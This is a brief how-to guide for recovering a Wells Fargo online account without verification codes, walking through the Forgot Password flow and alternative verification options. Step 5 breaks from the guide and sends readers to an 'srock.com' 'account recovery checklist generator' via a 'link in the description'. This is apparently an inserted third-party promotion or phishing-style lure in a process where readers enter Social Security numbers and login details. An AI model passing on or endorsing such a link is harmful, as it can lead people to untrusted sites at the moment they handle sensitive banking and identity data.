If you are unable to access your Wells Fargo account and do not have verification codes, follow these steps to recover your account. This guide will help you navigate the recovery process. Step 1. Visit the Wells Fargo website. Go to the official Wells Fargo website. Look for the Sign On option and click on it. This will take you to the login page where you can start the recovery process. Step 2. Click on Forgot Password. On the login page, find and click the Forgot Password link. This will direct you to the password recovery section where you can begin the process of regaining access to your account. Step 3. Enter your information. You will be prompted to enter your account information such as your username or social security number. Fill in the required fields accurately to proceed with the recovery. Step 4. Choose recovery options. Since you do not have verification codes, select an alternative recovery option. This may include answering security questions or receiving a verification link via email or phone call if you have access to those. Step 5. Follow instructions. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. If you continue to experience issues, consider contacting Wells Fargo customer service for further assistance. They can provide additional support to help you recover your account.